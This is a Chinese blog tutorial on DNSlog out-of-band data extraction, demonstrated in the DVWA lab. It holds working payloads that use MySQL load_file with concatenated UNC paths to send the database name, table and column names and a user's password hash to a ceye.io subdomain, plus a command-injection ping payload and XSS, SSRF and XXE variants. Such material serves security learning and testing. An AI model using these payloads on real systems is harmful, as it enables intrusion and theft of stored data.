mysql dns 注入_DNSlog应用

最新推荐文章于 2024-05-29 14:50:04 发布
最新推荐文章于 2024-05-29 14:50:04 发布
阅读量262 收藏
点赞数 1
CC 4.0 BY-SA版权
文章标签: mysql dns 注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_36296215/article/details/113426714
本文介绍了如何利用DNSlog在无回显的SQL注入、XSS、命令注入等场景下快速获取信息。通过DNS解析过程和UNC路径,结合数据库调用函数,如MySQL的load_file,实现盲注。同时,文章提供了测试案例,如在DVWA环境中利用DNSlog进行SQL盲注,并探讨了DNSlog在XSS、SSRF和XXE漏洞中的应用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

————背景说明————

在做渗透的时候,有一些漏洞发现无回显的,比如sql注入,一般当我们拿到一个无回显的注入,那么我们往往会采用盲注,使用二分法不断猜测字符等方式来取信息,不过这样的方式耗时又费力,而且频繁地测试容易被目标网站ban掉。那么面对盲注,或者是其他漏洞的盲打,有没有哪种方法,可以快速地获取我们需要的信息呢,答案是有的,即本篇主要说的,利用DNS快速获取数据,官方地讲即DNSlog。

这里涉及到DNS解析过程,UNC,以及一些数据库调用函数。

DNS解析的过程:当应用过程需要将一个主机域名映射为IP地址时,就调用域名解析函数,解析函数将待转换的域名放在DNS请求中,以UDP报文方式发给本地域名服务器。本地的域名服务器查到域名后,将对应的IP地址放在应答报文中返回。同时域名服务器还必须具有连向其他服务器的信息以支持不能解析时的转发。若域名服务器不能回答该请求,则此域名服务器就暂成为DNS中的另一个客户,向根域名服务器发出请求解析,根域名服务器一定能找到下面的所有二级域名的域名服务器,这样以此类推,一直向下解析,直到查询到所请求的域名。

UNC:是一种通用命名规则,也称通用命名规范、通用命名约定。格式:\\servername\sharename,其中servername是服务器名。sharename是共享资源的名称。目录或文件的UNC名称可以包括共享名称下的目录路径,格式为:\\servername\sharename\directory\filename。比如在机子hguone上面有个共享文件夹叫niap,那UNC就可以写成\\hguone\niap,当访问域名下的某个文件的时候,也可以试着用UNC。

既然需要DNS解析,可以自己注册个服务器+域名来用,某云服务器一个月十块,域名一年十几块,配置完比如sql盲注就可以直接sqlmap用--dns-domain=域名跑。

其他常用的在线平台,有ceye.io、dnslog.cn、burp自带的 Collaborator client等。

————测试————

这里我使用ceye进行试验。

登陆ceye.io后整体界面如下,记录自己的identifiler地址。

6858470d29aa0ecf120965b0ef0dcbc9.png

首先DNS查询列表啥都没有

1bd684bb7f9a51b25a09e996ea56951d.png

登录自己本地搭的数据库服务器用数据库语句简单测试一下

select load_file('\\\\test.indentifiler.ceye.io\hguone');

test和hguone位置符合unc规则爱写啥写啥

f74e785faf9171b866f46265a24c0ed8.png

执行以后,ceye上面可以得到相关查询信息

d123f8e18fd6aa6ebe551ee4f4f75eb8.png

————SQL盲注————

关于sql,我们可以使用一些数据库中引发DNS解析的子程序通过unc访问域名,产生DNS解析。把这个方式利用到盲注中,进行数据库查询,通过dns解析便可以接收到回显相关信息,获取所需要的数据,下面是不同数据库常用的几个函数:

mssql:

master..xp_dirtree             获取文件夹子文件夹

eg:EXEC master..xp_dirtree 'C:\hguone'
;

master..xp_fileexist           文件是否存在

eg: EXEC master..xp_fileexist 'C:\hguone.txt';

master..xp_subdirs           获取所有子文件夹

eg: EXEC master..xp_subdirs 'C:\hguone';

mysql:

load_file         读取文件并以字符串返回

eg: select load_file('C:\hguone.txt');

Oracle:

GET_HOST_ADDRES  检索主机ip

eg: select UTL_INADDR.GET_HOST_ADDRESS('hguone.com');

UTL_HTTP.REQUEST     从给定的地址检索前2000字节数据

eg: select UTL_HTTP.REQUEST('http://hguone.com/niap.php') FROM DUAL;

PostgreSQL:

COPY                               文件系统的文件和表之间拷贝数据

eg:COPY users(names) FROM 'C:\\Windows\\hguone\\users.txt'

这里使用的数据库是mysql以及网站是dvwa

dvwa注入情况如下,它只显示存在,不显示其他信息

2e8d52550569b44e2896b53855f00c8c.png

直接构造数据库语句查询当前数据库

'and if((select load_file(concat('\\\\',(select database()),'.indentifiler.ceye.io\\hguone'))),1,0)#

b122dcd4ae644dd1549ae1a679d89627.png

看一下源代码

b4fb6204d3659760a84ce6a5657c6a5f.png

这里相当于执行了如下语句

SELECT first_name, last_name FROM users WHERE user_id = '' and if((select load_file(concat('\\\\',(select database()),'.indentifiler.ceye.io\\hguone'))),1,0)

接着看看表

'and if((select load_file(concat('\\\\',(select table_name from information_schema.tables where table_schema=database() limit 1,1),'.indentifiler.ceye.io\\hguone'))),1,0)#

因为拼接则字段只能有一条,所以结果是多条数据则需要引入limit限制,否则会报错

5351ead51b49bcf972634267a0c56175.png

然后看看字段

'and if((select load_file(concat('\\\\',(select column_name from information_schema.columns where table_name='users'limit 0,1),'.indentifiler.ceye.io\\hguone'))),1,0)#

733c6f8323ecd33b3be7017e229c1757.png

然后看完字段名直接猜密码啥的了

'and if((select load_file(concat('\\\\',(select password from users where user_id='1'),'.indentifiler.ceye.io\\hguone'))),1,0)#

b6e3d5622a338647ccb216d44aedc4fa.png

解密一下其实就是password

2e2f006f6fb44aeb44e6a98d9ce5ab73.png

————XSS————

dnslog也可以应用于xss的盲打,有时候提交payload存储进去并不会在我们的界面触发,有时候是在后台管理员界面触发。这种情况下dnslog可以应用,在后台判断是否触发了这些xss攻击代码。而且一般我们是用script标签引入远程的js,有时候会有csp,而这种方式的盲打有时可以绕过csp。

这里也用dvwa的漏洞环境,我们假设这是个盲式的xss。

91de6586fe496b810dfac06435cbe692.png

设置相关的payload

hguone

60e231f88007bc74ded7a8d2ebbb89bb.png

访问页面触发,然后查看记录

7991fe358c0dd2e46b137da424d01660.png

————命令注入————

一般确定无回显的命令注入漏洞时,而且有时候又要进一步利用来获取一些关键信息,针对这种情况,采用dnslog进行这种盲打效果是不错的。

这里的应用主要是利用了系统变量+dnslog

一样是使用dvwad的环境,我们一样假设这是无回显的漏洞点。

40cc0087ae618d55de2640db0f5c7c9c.png

让其ping我们构造的payload

%OS%.292w6g.dnslog.cn

这里我换了个dnslog平台,ceye用多了本机留存了解析记录,我没删,刚好就换个平台也演示一下。

c1af6ffabdd0b3c6d638d27e2b06ed10.png

解析的结果如下

0c85c1343c353f6f8dfd4a3a920379bf.png

附上一些windows常用变量

%APPDATA% :  列出应用程序数据的默认存放位置。

%CD% :  列出当前目录。

%OS% :  列出操作系统的名字。

%Path% :  列出了可执行文件的搜索路径。

%PATHEXT% :  列出操作系统认为可被执行的文件扩展名

%CMDCMDLINE% :  列出启动当前cmd.exe所使用的命令行。

%CMDEXTVERSION% :  命令出当前命令处理程序扩展版本号。

%COMPUTERNAME% :  列出了计算机名。

%COMSPEC% :  列出了可执行命令外壳(命令处理程序)的路径。

%DATE% :  列出当前日期。

%HOMEPATH% :  列出用户主目录的完整路径。

%HOMESHARE% :  列出用户共享主目录的网络路径。

%LOGONSEVER% :  列出有效的当前登录会话的域名控制器名。

————SSRF————

文件包含检测的时候,将文件路径修改为dns服务器,通过dns查看dns解析记录,可以以此判断是否存在相关漏洞

php简单写了一个ssrf的环境

ee5b796d1c6dc89efed63fdf37b166ca.png

本地访问

4dbf679bbdbee74182cd2c3c6a391595.png

修改url利用漏洞访问dns资源

0e927701200de8752e552268cf187702.png

查看解析记录

4865e2e615457c7d215ab891892a68fb.png

————XXE————

用于盲打,引用外部实体,可以利用dnslog在平台获取所需要的信息。

这里使用的是burp自带的Collaborator client,环境是burp的实验室环境

https://portswigger.net/web-security/xxe/blind

1d24e2f4437ef9a64f6a4689b0748bfd.png

在服务器保存恶意的DTD

05de8fce1d26110f583fd410647c7902.png

489ba661d58d4637810c31742f2ecaf7.png

在无回显的漏洞处抓包

64e674105db688b069ecbb0b50ef69e2.png

017557ae2bc5e5c73ef0ff30b098913e.png

修改数据表进行引用恶意的DTD

52740025711220853f93fa40ee5b5c44.png

查询结果

c755e25aaa4338ec05011d99cc4ab917.png

————注意事项————

1、解析的地址如果通过UNC命名规则设置,由于linux没有UNC,所以就只适用于windows DNS解析过程中。但是并不意味着linux不适用dnslog,比如用ping,用curl是可以的。

2、UNC路径不能超过128,否则报错,这限制了比如sql的查询语句的长度。

3、SQL中像load_file这类函数使用需要当前账户有写权限。

————结束撒花————

独狼苏
关注
16、Mysql - dns注入
songling515010475的专栏
05-22 227
为什么load_file能执行? 因为在mysql配置文件里开启了secure_file_priv服务,导致不对mysql的导入导出不做任何限制。 1.前往dnslog.cn申请一个域名 2.防止被WAF拦截,所以在后面拼接/123.txt?id=123当作参数,因为.txt会被WAF认为txt是不能传参数的,是安全的。申请的域名,前面要加三级域名,后面也要加路径,否则不会生效。 /123.txt?id=123 and load_file(concat('//',(select database
dnslogmysql在linux_DNSlog平台各种利用姿势(盲注)
weixin_30588427的博客
02-23 716
题记首先祝大家新年快乐,过年给我最大的感觉就是几家欢喜几家愁,我们国家总量看似光鲜,可是平均下来也不多,小老百姓更不容易了,一般没有文化的百姓除了创业就是打工就是中间商赚差价,真是生活不易,加油,一起建设新中国。DNSlog我以前是通过看推文了解过,后来零组上架了这么个功能,想着试试,后来发现零组的好像还用不了,还是用别的平台吧,这是可以利用它进行快速盲注的工具,看完大佬们的文章复现完受益良多,g...
MySQL注入-Dns_log注入
m0_51313985的博客
05-18 331
在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起请求,这个时候就可以通过DNS请求把想获得的数据外带出来。 对于sql盲注,常见的方法就是二分法去一个个猜,但是这样的方法麻烦不说,还很容易因为数据请求频繁导致被Ban 所以可以将select到的数据发送给一个url,利用dns解析 产生的记录日志来查看数据。 Dns-log =>DNS域名解析协议=>将域名转化为IP log=>日志(记录的东西) Dns的日志 外带数据(oob)–>这里是一个延时盲注 我让数据库去访问某个网站
mysql dnslog_mysql-dnslog注入
weixin_39836751的博客
01-19 300
@Adminxednslog原理简介:简单理解就是在利用注入漏洞的时候,页面无回显,无法直接获得回显信息的情况下,目标可以发起DNS请求,这时就可以尝试通过DNSlog注入的方式把想获得的数据外带出来。对于SQL盲注,我们可以通过布尔或者时间盲注获取内容,但是整个过程效率低,需要发送很多的请求进行判断,容易触发安全设备的防护,Dnslog盲注可以减少发送的请求,直接回显数据实现注入mysql下的...
mysql——DNS注入
qq_45300786的博客
08-09 1868
DNS log 【DNS日志注入DNS协议:将域名转化为IP 日志 => 记录了域名转化IP请求 DNS注入的核心,将盲注转化为显错注入 DNS协议:将域名转化为IP 日志 => 记录了域名转化IP请求 比如 ox.qidao.com => DNS记录了这个请求, 那么我们也可以让mysql也能发出请求,DNS也会记录 ...
mysql-dnslog注入
Adminxe的博客
05-05 1979
@Adminxe http://ceye.io/ //dnslog注入平台 dnslog原理简介: 简单理解就是在利用注入漏洞的时候,页面无回显,无法直接获得回显信息的情况下,目标可以发起DNS请求,这时就可以尝试通过DNSlog注入的方式把想获得的数据外带出来。 对于SQL盲注,我们可以通过布尔或者时间盲注获取内容,但是整个过程效率低,需要发送很多的请求进行判断,容易触发安全设...
DNS_LOG注入
学习、分享、交流
05-19 1735
DNSLOG注入:利用DNS解析,日志记录把数据库里面的内容给带出来···
https防止注入_数据库DNSLog外带注入总结
weixin_39553600的博客
11-20 664
sql注入中利用的骚姿势你又知道几个?DNSLog外带注入DNSlog带外注入?(OOB)其实是一样的,叫法不同!本人还是习惯叫外带注入,自我感觉,比较顺口为什么需要外带注入?当我们对一个数据库进行注入时,无回显,且无法进行时间注入,那么就可以利用一个通道,把查询到数据通过通道带出去,这里的通道包括:http请求、DNS解析、SMB服务等...
SQL注入DnsLog注入
qq_52310755的博客
03-22 2415
远程访问UNC路径中主机的地址,如果是域名将会进行解析并留下记录,通过查看DNS解析记录(DNS日志)来达到有回显的目的。DnsLog注入就是利用load_file()函数访问远程文件的特点,对延时盲注等无回显的注入或其他无回显的攻击带来回显。正常来讲每个查询记录都会在相应DNS服务器上留下相关的查询日志,一般来说企业或者自己部署的DNS在上图标红位置处,Ps:如果paylaod没有问题但一直刷新不出来可能是谷歌浏览器的问题,换个浏览器访问一下就可以了。,下面以盲注为例,需要有盲注的基础。
2021-11-13加解密,二次,load_file&dnslog注入换地方写了
weixin_44532761的博客
11-17 8257
小迪v17
MySQL_DNS注入
Mr.Huang_的博客
09-06 220
一、DNSLOG的使用场景 DNS log 【DNS日志注入DNS协议:将域名转化为IP 日志 => 记录了域名转化IP请求 日志 => 日记 - 记录操作、记录访问的文件 DNS日志 => 某时某分谁谁谁请求我查某某域名 如果我们搭建一个DNS服务器来承接域名解析。所有的访问域名都会被我们的日志记录下来 域名 => 由运营商解析。 修改域名的设置方法,强行执行某个Ip去解析域名 NS记录 固定的域名 由固定的DNS服务器解析 DNS注入的核心,将盲注转化为显错注入 DNS协议
mysql注入---DNSLOG注入
nini_boom的博客
07-21 620
不一定学习进度速度快,就代表掌控的东西就多。学习的目标在于对于理解的知识深度和广度,速度快会有很多时间学习广度的东西,但在有限广度的情况下,理解的深度才是更重要的,所以在这种情况下,不要在意学习的进度,把握住学习的节奏,向更深处理解。扎下深根的竹子,在疯狂生长的时候才有更多的后备力量。 0x01 DNSLOG注入 当我们遇到了盲注、延时注入时,页面没有具体的返回。 但是盲注、延时注入需要进行大...
MYSQL--Dns注入
qq_68233961的博客
08-07 1192
MYSQL--Dns注入
MySQL注入Dns 注入
baimaozi008的博客
05-29 1224
本教程的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失。通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录此时变为显错注入,将盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,访问时将访问服务器,记录后查看日志。然后1806dl.dnslog.cn的子域名的解析都是在某台服务器,然后他记录下来了有人请求访问了error.1806dl.dnslog.cn,然后在DnsLog这个平台上面显示出来了。
mysql注入dns注入
seek_2022的博客
05-03 2512
文章目录一、DNS-LOG使用(域名解析日志)(一)DNS简介(二)LOG日志是怎么产生的?(三)DNS-LOG在渗透测试中的应用二、DNS注入相关知识回顾(一)load_file() 读取文件(二)UNC路径(三)绕靶场WAF三、DNS注入靶场实战(一)判断SQL注入(一)绕靶场WAF(二)查询库名(三)查询表名(四)查询字段名(五)查询并提交flag四、小结 一、DNS-LOG使用(域名解析日志) (一)DNS简介 DNS(域名解析)是把域名指向网站空间IP,让人们通过注册的域名可以方便地访问到网站的一
mysql数据库中的骚姿势-dnslog注入原理
m0_46304840的博客
05-27 2497
前言 我以为我写过dns注入了,结果我心血来潮看看博客,发现我居然还没有写 那么我就写一下 0x01.Dns注入原理 什么是dns? 例子:我们去访问 www.baidu.com,这时候dns会吧 www.baidu.com 这个域名转换为 IP地址 Dns其实就是负责把域名转换为IP地址 如果还不懂的话点击 点击这里查看 Dns在域名解析时会留下域名和解析ip的记录,利用这点我们可以使用Dnslog(日志)记录显示我们的 注入结果 dnslog注入原理 通过子查询,将内容拼接到域名内,让load_f
DNSlog实现Mysql注入
weixin_30883777的博客
03-22 309
step1: 通过DNSlog盲注需要用到load_file()函数。show variables like '%secure%' 查看load_file()可以读取的磁盘。 1、当secure_file_priv为空,就可以读取磁盘的目录。 2、当secure_file_priv为G:\,就可以读取G盘的文件。 3、当secure_file_priv为null,load_file就不...
mysql dns 注入_SQL注入-DNS注入(二)
weixin_36125719的博客
01-27 244
其实就是盲注的简化版本,不过这种方式确实简单,不需要写py脚本一点点去跑参考文章:0x01、关于DNSlog在Web攻击的利用DNSlog在Web漏洞利用中已经是老生常谈的问题,简单理解就是在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起DNS请求,这个时候就可以通过这种方式把想获得的数据外带出来。0x02、常用在哪些情况下SQL注入中的盲注无回显的命令执行无回显的SSRF0x03、Dns...
【SQL注入DNSlog方式
m0_57347472的博客
03-22 363
DNSlog注入也可以称之为dns带外查询,Dns在域名解析时会在DNS服务器上留下域名和解析il的记录,可以在dns服务器上查询相应的dns解析记录,来获取大致原理。那么我们就可以通过只有的方式然后拼接数据库函数,通过DNSlog获得数据库的信息。http://ceye.io/ 知道创宇公司提供的。上图是创宇公司提供的的DNSlog服务器网址。修改limit的数字即可得到其他表名。DNSlog服务器无需自己搭建。此处的路径我们称之为UNC路径。
DNSLOG注入常用语句
最新发布
03-31
在SQL盲注场景下,DNSLog注入是一种常见的技术手段,它可以通过`load_file()`函数或其他方式触发DNS解析请求,并将目标数据发送至指定的DNSLog平台。以下是几种常用的DNSLog注入Payload示例: #### Payload 示例 1...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值